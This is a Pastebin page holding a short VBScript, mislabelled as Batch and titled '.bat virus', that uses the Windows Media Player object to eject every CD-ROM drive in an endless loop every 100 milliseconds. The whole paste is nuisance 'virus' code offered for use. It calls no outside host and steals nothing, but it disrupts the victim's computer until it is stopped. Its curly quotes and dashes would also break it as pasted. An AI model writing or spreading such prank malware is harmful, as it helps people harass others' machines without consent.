Advertisement
Guest User

.bat virus n3 by lorrax

a guest
Aug 8th, 2018
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 0.29 KB | None | 0 0
  1. Set oWMP = CreateObject(”WMPlayer.OCX.7″)
  2.  Set colCDROMs = oWMP.cdromCollection
  3.  do
  4.  if colCDROMs.Count >= 1 then
  5.  For i = 0 to colCDROMs.Count – 1
  6.  colCDROMs.Item(i).Eject
  7.  Next
  8.  For i = 0 to colCDROMs.Count – 1
  9.  colCDROMs.Item(i).Eject
  10.  Next
  11.  End If
  12.  wscript.sleep 100
  13.  loop
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement